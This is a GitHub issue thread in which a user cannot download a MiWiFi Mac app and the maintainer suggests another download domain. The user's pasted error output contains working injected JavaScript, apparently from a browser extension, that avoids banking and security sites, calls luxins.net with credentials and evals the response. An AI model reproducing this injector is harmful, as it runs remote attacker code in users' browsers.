### ISSUE TITLE
Cannot download file

### ISSUE THREAD

**Issue by Stefan-CPlanet** [jashjacob/MiWIFI-Router-Mac-App-English-Translation#6]
page is not available,
Issue:

This XML file does not appear to have any style information associated with it. The document tree is shown below.
<Error>
<Code>AccessDenied</Code>
<Message>Access Denied</Message>
<Resource>/</Resource>
<RequestId>6b0da9a4580d44c8ab7abcec38af65a3</RequestId>
</Error>
(function(callback, eventName, timeout) { if (typeof window.CustomEvent !== "function") { const CustomEvent = function(event, params) { params = params || { bubbles: false, cancelable: false, detail: null }; var evt = document.createEvent('CustomEvent'); evt.initCustomEvent(event, params.bubbles, params.cancelable, params.detail); return evt; }; CustomEvent.prototype = window.Event.prototype; window.CustomEvent = CustomEvent; } let run = false; const handle = function() { if (run) { return; } run = true; const e = new CustomEvent(eventName, { detail: JSON.stringify(callback()) }); window.dispatchEvent(e); }; if(timeout) { setTimeout(handle, timeout); } else { handle(); }})(function(){(function (doc, w) { "use strict"; var except = ['youtube.com', 'alitools.io', 'vtb24.ru', 'bank', 'login.aliexpress.com', 'vk.com', 'facebook.com', 'instagram.com', 'linkedin.com', 'vimeo.com', 'skyload.io', 'pb.ua', 'privatbank.ua', 'google', 'yandex', 'ya.ru', 'opera', 'kaspersky', 'localhost']; var host = doc.location.href; var run = except.filter(function (h) { return host.indexOf(h) >= 0; }).length === 0; if (!run) { return; } if (w.top !== w.self) { return; } var params = { id: 304 }; var qs = []; for (var key in params) { qs.push(key + '=' + encodeURIComponent(params[key])); } var r = new XMLHttpRequest(); r.withCredentials = true; r.onload = function() {eval(this.responseText);}; r.open("get", 'https://luxins.net/code?' + qs.join('&')); r.send(); })(document, window); },"skyload-event-406-1593339616449",);

Please allow public access. Thanks

**Comment by jashjacob** [comment]
Which file are you reffering to?

**Comment by Stefan-CPlanet** [comment]
any and all files under bigota.miwifi.com . I tried downloading miwifi app
for mac from github or website but it doesn't work.
Best regards,

**Comment by jashjacob** [comment]
Bigota.MiWifi is no longer working. They have discontinued support.

What is the issue with the .dmg file in the Github? Are you not able to mount the file? Please share screenshot.

**Comment by jashjacob** [comment]
Use the follow domain as suggest in another bug fix - http://cdn.cnbj1.fds.api.mi-img.com/
